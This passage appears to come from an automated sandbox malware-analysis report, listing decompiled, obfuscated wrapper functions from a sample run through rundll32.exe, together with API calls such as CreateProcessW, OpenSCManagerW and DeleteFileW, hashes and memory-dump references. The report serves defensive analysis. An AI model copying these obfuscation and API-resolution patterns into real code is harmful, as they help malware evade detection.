                                                      • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                                      • Instruction Fuzzy Hash: 2D012CB5941308FBEB45DF94DD06A9E7BB5EB18704F108188FA0566190D7B15A209B51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001BAA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E001BAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001A602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E001B07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                                      0x001baa3f
                                                      0x001baa40
                                                      0x001baa41
                                                      0x001baa44
                                                      0x001baa47
                                                      0x001baa4b
                                                      0x001baa4c
                                                      0x001baa51
                                                      0x001baa5b
                                                      0x001baa64
                                                      0x001baa68
                                                      0x001baa6f
                                                      0x001baa76
                                                      0x001baa8d
                                                      0x001baa90
                                                      0x001baa9d
                                                      0x001baaa8
                                                      0x001baaad

                                                      APIs
                                                      • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 001BAAA8
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                                      • Instruction ID: 38beca1a52a817a935afa96b8843bd557fd6e6818e72c6d2ef1ffa71afed9f2f
                                                      • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                                      • Instruction Fuzzy Hash: C5F069B590020CFFDF08DFA4DD4A89EBFB4EB45304F108088F905A6250D7B29B549B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001A5FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 70%
                                                      			E001A5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001A602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E001B07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                                      0x001a5fb5
                                                      0x001a5fb6
                                                      0x001a5fb7
                                                      0x001a5fbb
                                                      0x001a5fbc
                                                      0x001a5fc1
                                                      0x001a5fcb
                                                      0x001a5fd7
                                                      0x001a5fde
                                                      0x001a5fe5
                                                      0x001a5ffc
                                                      0x001a5fff
                                                      0x001a6006
                                                      0x001a600d
                                                      0x001a601a
                                                      0x001a6025
                                                      0x001a602a

                                                      APIs
                                                      • CloseServiceHandle.ADVAPI32(39CCF342), ref: 001A6025
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleService
                                                      • String ID:
                                                      • API String ID: 1725840886-0
                                                      • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                                      • Instruction ID: 266ed730544f100bafaeeee47fcd9407c5a1817c99f09a0a8e6eecd9317c3c87
                                                      • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                                      • Instruction Fuzzy Hash: ACF04FB4C11208FFDB08DFA0E94689EBFB8EB50300F208198E549A7260E7715F559F54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Analysis Process: rundll32.exe PID: 2856 Parent PID: 2904 rundll32.exeCOMMON

                                                      Executed Functions

                                                      Function 006C2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E006C2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E006C602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E006D07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                                      0x006c295f
                                                      0x006c2964
                                                      0x006c2967
                                                      0x006c296a
                                                      0x006c296d
                                                      0x006c296e
                                                      0x006c296f
                                                      0x006c2977
                                                      0x006c2985
                                                      0x006c298a
                                                      0x006c2992
                                                      0x006c299a
                                                      0x006c29a2
                                                      0x006c29a9
                                                      0x006c29b0
                                                      0x006c29b7
                                                      0x006c29bb
                                                      0x006c29cf
                                                      0x006c29dc
                                                      0x006c29e2

                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 006C29DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ManagerOpen
                                                      • String ID: <^
                                                      • API String ID: 1889721586-3203995635
                                                      • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                                      • Instruction ID: 0d90814f6e3e98dddc946965e93f2e1c0a25011b10019f6726629396f8a684e9
                                                      • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                                      • Instruction Fuzzy Hash: 6A016D72A00108BFEB14DF95DC0A9DFBFB6EF44310F108089F508A6250D7B69F619B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 006CC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E006CC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E006C602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E006D07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                                      0x006cc6e1
                                                      0x006cc6e6
                                                      0x006cc6f0
                                                      0x006cc6fc
                                                      0x006cc703
                                                      0x006cc706
                                                      0x006cc70d
                                                      0x006cc711
                                                      0x006cc715
                                                      0x006cc71c
                                                      0x006cc723
                                                      0x006cc72a
                                                      0x006cc731
                                                      0x006cc738
                                                      0x006cc751
                                                      0x006cc762
                                                      0x006cc768

                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 006CC762
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FolderPath
                                                      • String ID: /O
                                                      • API String ID: 1514166925-1923427199
                                                      • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                                      • Instruction ID: 7e0c757dfb255f1e9486b82fffa48cea1d3adc185dba1f33bdcace53b76a2b62
                                                      • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                                      • Instruction Fuzzy Hash: 391133B290122DBBCB25DF94DD498EFBFB9EF04714F108188F90966210D3B14B659BE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 006C1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E006C1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E006C602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E006D07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                                      0x006c1006
                                                      0x006c1009
                                                      0x006c100c
                                                      0x006c1011
                                                      0x006c1016
                                                      0x006c101d
                                                      0x006c1026
                                                      0x006c102d
                                                      0x006c1034
                                                      0x006c103b
                                                      0x006c1047
                                                      0x006c104f
                                                      0x006c1057
                                                      0x006c105e
                                                      0x006c1065
                                                      0x006c106c
                                                      0x006c1073
                                                      0x006c1077
                                                      0x006c108b
                                                      0x006c1096
                                                      0x006c109b

                                                      APIs
                                                      • LoadLibraryW.KERNEL32(0033A3B7), ref: 006C1096
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: [
                                                      • API String ID: 1029625771-3431493590
                                                      • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction ID: 595082948c127377ca9c24a2aaf2efaa831d8029a0979ed7cd247bea10029107
                                                      • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction Fuzzy Hash: C2015BB6D01309BBEF44DF94C94AADEBBB1EB54318F108188E41466291D3B19B649B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 006C4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E006C4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E006D07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                                      0x006c485e
                                                      0x006c487a
                                                      0x006c487d
                                                      0x006c4884
                                                      0x006c488b
                                                      0x006c4892
                                                      0x006c489d
                                                      0x006c48a0
                                                      0x006c48ad
                                                      0x006c48b7

                                                      APIs
                                                      • ExitProcess.KERNELBASE(00000000), ref: 006C48B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID: [
                                                      • API String ID: 621844428-1822564810
                                                      • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction ID: f977ee72c49a2ce788bd0dd8ccf2a57d70dd6a84fe47d661be0c35e563bf7402
                                                      • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction Fuzzy Hash: 66F01D70D05209FBDB44CFE8C95699EBFB5EB40301F20818DE444B7290E3B15F509B54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 006D4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 66%
                                                      			E006D4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E006C602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E006D07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                                      0x006d4f80
                                                      0x006d4f81
                                                      0x006d4f82
                                                      0x006d4f86
                                                      0x006d4f87
                                                      0x006d4f8c
                                                      0x006d4fa5
                                                      0x006d4fa8
                                                      0x006d4faf
                                                      0x006d4fb6
                                                      0x006d4fc7
                                                      0x006d4fca
                                                      0x006d4fd7
                                                      0x006d4fe2
                                                      0x006d4fe7

                                                      APIs
                                                      • CloseHandle.KERNELBASE(003E66D8), ref: 006D4FE2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: {#lm
                                                      • API String ID: 2962429428-1564096886
                                                      • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction ID: dc35befc03082ea648cf0aa4494a33d20af433371597595b82786401f99a50a2
                                                      • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction Fuzzy Hash: 3BF037B0C1120CFFEB04DFA4DA4689EBFBAEB40300F20819DE808BB250D3715B509B54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 006D976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 21%
                                                      			E006D976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006C602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E006D07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                                      0x006d9772
                                                      0x006d9773
                                                      0x006d9778
                                                      0x006d977a
                                                      0x006d977b
                                                      0x006d977e
                                                      0x006d977f
                                                      0x006d9782
                                                      0x006d9785
                                                      0x006d9788
                                                      0x006d9789
                                                      0x006d978c
                                                      0x006d978f
                                                      0x006d9790
                                                      0x006d9791
                                                      0x006d9794
                                                      0x006d9797
                                                      0x006d979a
                                                      0x006d979d
                                                      0x006d97a0
                                                      0x006d97a3
                                                      0x006d97a6
                                                      0x006d97a7
                                                      0x006d97a8
                                                      0x006d97ad
                                                      0x006d97b7
                                                      0x006d97c3
                                                      0x006d97ca
                                                      0x006d97d1
                                                      0x006d97d8
                                                      0x006d97df
                                                      0x006d97e3
                                                      0x006d97fc
                                                      0x006d9816
                                                      0x006d981d

                                                      APIs
                                                      • CreateProcessW.KERNEL32(006C591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,006C591A), ref: 006D9816
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction ID: 3f8e90123bad8e9db8c238fbfb71a36c04cb31a8b2b8d6f9f018623c35058772
                                                      • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction Fuzzy Hash: 3011D372900148BBDF599F92DC0ACDF7F3AEF89750F104048FA1456120D2728A60EBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 006CB566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 31%
                                                      			E006CB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E006C602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E006D07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                                      0x006cb569
                                                      0x006cb56a
                                                      0x006cb56d
                                                      0x006cb572
                                                      0x006cb574
                                                      0x006cb577
                                                      0x006cb57a
                                                      0x006cb57d
                                                      0x006cb580
                                                      0x006cb583
                                                      0x006cb586
                                                      0x006cb587
                                                      0x006cb58a
                                                      0x006cb58d
                                                      0x006cb590
                                                      0x006cb593
                                                      0x006cb594
                                                      0x006cb595
                                                      0x006cb59a
                                                      0x006cb5a4
                                                      0x006cb5b8
                                                      0x006cb5c0
                                                      0x006cb5c4
                                                      0x006cb5cb
                                                      0x006cb5d2
                                                      0x006cb5d9
                                                      0x006cb5e6
                                                      0x006cb5fd
                                                      0x006cb604

                                                      APIs
                                                      • CreateFileW.KERNELBASE(006D0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,006D0668,?,?,?,?), ref: 006CB5FD
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction ID: 4dfd29d2e95c8a81270e188d170eef02627936aac4c261a76deba25f80d2271c
                                                      • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction Fuzzy Hash: 8E11C372801248BBDF56DF95DD06CEE7F7AFF89314F148198FA1862120D3729A20EB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 006D981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 54%
                                                      			E006D981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006C602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E006D07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                                      0x006d9821
                                                      0x006d9822
                                                      0x006d9825
                                                      0x006d9828
                                                      0x006d982a
                                                      0x006d982c
                                                      0x006d982f
                                                      0x006d9832
                                                      0x006d9835
                                                      0x006d9836
                                                      0x006d9837
                                                      0x006d983c
                                                      0x006d9855
                                                      0x006d9858
                                                      0x006d985f
                                                      0x006d9866
                                                      0x006d986d
                                                      0x006d9874
                                                      0x006d987b
                                                      0x006d988e
                                                      0x006d989b
                                                      0x006d98a2

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,006C87F2,0000CAAE,0000510C,AD82F196), ref: 006D989B
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction ID: bd96d7fd845bcf9acbec375f88614873cfd5b079acd079bb1ab1d14eab653b18
                                                      • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction Fuzzy Hash: 98019A72801208FBDB04EFD5D846CDFBF79EF85310F10818DF908A6220E6719B219BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 006D7BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E006D7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006C602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E006D07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                                      0x006d7bf7
                                                      0x006d7bf8
                                                      0x006d7bfa
                                                      0x006d7bfd
                                                      0x006d7bff
                                                      0x006d7c02
                                                      0x006d7c06
                                                      0x006d7c07
                                                      0x006d7c0f
                                                      0x006d7c1d
                                                      0x006d7c25
                                                      0x006d7c2d
                                                      0x006d7c31
                                                      0x006d7c38
                                                      0x006d7c3f
                                                      0x006d7c46
                                                      0x006d7c4a
                                                      0x006d7c5e
                                                      0x006d7c67
                                                      0x006d7c6d

                                                      APIs
                                                      • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 006D7C67
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileOperation
                                                      • String ID:
                                                      • API String ID: 3080627654-0
                                                      • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction ID: 265b839422b40c41ae9c4a18b9b8809066ca68da7193d2a8cd01760036c7e771
                                                      • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction Fuzzy Hash: BC014FB190120CFFEB49DF94C94A9DE7BB5EF44314F20819DF40567240E6B15F509B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 006CF65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                                      Download Yara Rule
